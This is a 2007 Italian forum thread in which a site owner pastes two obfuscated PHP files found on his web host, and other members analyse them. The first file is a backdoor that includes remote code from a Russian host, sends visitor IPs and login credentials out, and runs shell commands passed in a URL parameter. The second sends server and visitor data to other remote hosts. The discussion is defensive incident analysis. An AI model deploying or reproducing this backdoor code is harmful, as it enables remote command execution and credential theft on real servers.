Gighen

.grande:maestro.

User info:

Registered: Nov 2002
Posts: 527 (0.06 al dì)
Location: Brixia
Corso: Specialista!!
Anno: con quante N ??
Time Online: 10 Days, 7:41:56 [...]
Status: Offline

Post actions:

ciao..
mi sono trovato dei file di certo non miei in nel mio spazio web...

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode(" aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZH
I9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>


-----------------------------------------

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>


secondo voi cosa fanno???

__________________
"Documentation is like sex: when it's good, it's very, very good; and when it's bad, it's still better than nothing."
Dick Brandon

hannibal

.illuminato.

User info:

Registered: Sep 2004
Posts: 198 (0.03 al dì)
Location:
Corso: Informatica Magistrale
Anno:
Time Online: 6 Days, 1:14:46 [...]
Status: Offline

Post actions:

Non mi sono messo esattamente a decifrarli per benino, comunque ad una prima occhiata mi sembra una backdoor. Cercano di mascherare i loro sporchi parametri usando la codifica base 64, e usano tutto ciò per ricevere vari dati sul tuo server. Comunque se decodifichi
aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZH
I9
ti viene fuori http://bis.iframe.ru/master.php?r_addr=

File sospetto che punta a url russo = zappa via la webroot e inizia a interrogarti su come sono entrati. Personalmente ho due idee

1) [probabilità 10%] hanno bucato ftp e ti hanno uploadato quello schifo. Dubito, avrebbero potuto fare anche cose peggiori in questo caso.
2) [probabilità 90%] avevi sul server uno script php che permette l'upload e che soffre di una vulnerabilità grossa come una casa, i furbi sono quindi riusciti ad uploadare il file che volevano loro (dubito che tu permettessi l'upload di file .php) nella cartella che volevano loro (dubito che tu permettessi l'upload di file dandogli pure permessi di esecuzione)

Sempre a naso potrei dirti che si potrebbe trattare di un attacco fatto su larga scala (stile worm), il che sarebbe sensato se tu avessi avuto sul server una applicazione php parecchio nota e parecchio buggata (phpbb?)

__________________
Computer Science: solving today's problems tomorrow.

yeah

.grande:maestro.

User info:

Registered: Nov 2003
Posts: 1644 (0.20 al dì)
Location: Cologno Monzese
Corso: Informatica Magistrale
Anno: II
Time Online: 12 Days, 21:36:41 [...]
Status: Offline

Post actions:

Nomi dei file? Sono stati collegati a pagine?

Il primo sembra inviare dati a http://bis.iframe.ru/master.php?r_addr= (decodificato da base64 dalla stringa in base64_decode(" aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZH
I9"), dati che preleva forse da qualche modulo sul tuo sito.

Inoltre questa riga

code:

 if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}

permette di eseguire un programma passato sull'URL

Anche il secondo probabilmente fa qualcosa di simile, ho dato solo una rapida lettura.

Ma sono stati collegati ad altre pagine?

[edit] Arrivato tardi

__________________
?

Last edited by yeah on 26-02-2007 at 17:50

Gighen

.grande:maestro.

User info:

Registered: Nov 2002
Posts: 527 (0.06 al dì)
Location: Brixia
Corso: Specialista!!
Anno: con quante N ??
Time Online: 10 Days, 7:41:56 [...]
Status: Offline

Post actions:

avevo capito capito fosse una cosa così ma non mi è ancora chiaro cosa esattamente...
ho scoperto il problema per una grandissima quantità di mail delivery failure da casella @ilmiodominio che non esistono.

Non mi pare di averperò trovato nulla che sendi emails, anche se quello che dice yeah del GET....

Per il momento ho rimosso tutti i file ed ho contattato l'assistenza clienti
[cmq niente PHPBB, solo wordpress :/]

__________________
"Documentation is like sex: when it's good, it's very, very good; and when it's bad, it's still better than nothing."
Dick Brandon

DeepBlue

tired guy

User info:

Registered: Sep 2003
Posts: 4258 (0.52 al dì)
Location: CSN
Corso: Info tlc
Anno:
Time Online: 52 Days, 8:40:31 [...]
Status: Offline

Post actions:

http://secunia.com/search/?search=wordpress ?

__________________
~ get Debian! ~ get FreeBSD! ~ get OpenBSD! ~